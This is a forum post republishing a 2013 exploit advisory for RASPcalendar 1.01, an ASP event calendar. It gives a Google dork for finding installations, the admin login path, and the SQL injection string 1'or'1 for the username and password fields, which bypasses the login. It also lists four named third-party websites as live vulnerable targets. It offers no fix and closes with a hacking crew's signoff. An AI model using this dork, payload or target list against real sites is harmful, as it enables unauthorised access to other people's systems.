Jump to content
Fi8sVrs

RASPcalendar 1.01 - [ASP] Admin Login Vlunerabilities

Recommended Posts

  • Active Members
Posted

RASPcalendar version 1.01 suffers from a remote SQL injection vulnerability that allows for login bypass.

---------------------------------------------------
RASPcalendar 1.01 [ASP] Admin Login Vlunerabilities
---------------------------------------------------
Author : Hackeri-AL
Date : 06-11-2013
Vendor Homepage : http://www.rttucson.com/files.html
Software link : http://www.rttucson.com/RASPcalendar.zip
Verison : 1.01
Tested On : Windows XP
------------------------------------------------------------

Google Dork: allinurl:RASPcalendar "powered by RASPcalendar"

------------------------------------------------------------

Example : http://www.usfim.it/RASPcalendar/
: http://site.com/events
: http://site.com/calendar
: etc...

Go to : http://www.usfim.it/RASPcalendar/admin/

UserName : 1'or'1
PassWord : 1'or'1

Login Success Fully

------------------------------------------------------------

Vuln sites demo :

http://www.usfim.it/RASPcalendar/admin
http://www.davemitchellassociates.com/events/admin
http://www.bradandrebecca.com/Calendar/admin
http://www.hlubline.com/pt/calendar/admin

------------------------------------------------------------

Found By Hackeri-AL , UAH-Crew Group 2009-2013

UNITED ALBANIAN HACKERS , Thnx to LoocK3D & b4cKd00r ~

[~] Legends Of Albania

------------------------------------------------------------

RASPcalendar 1.01 - [ASP] Admin Login Vlunerabilities

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...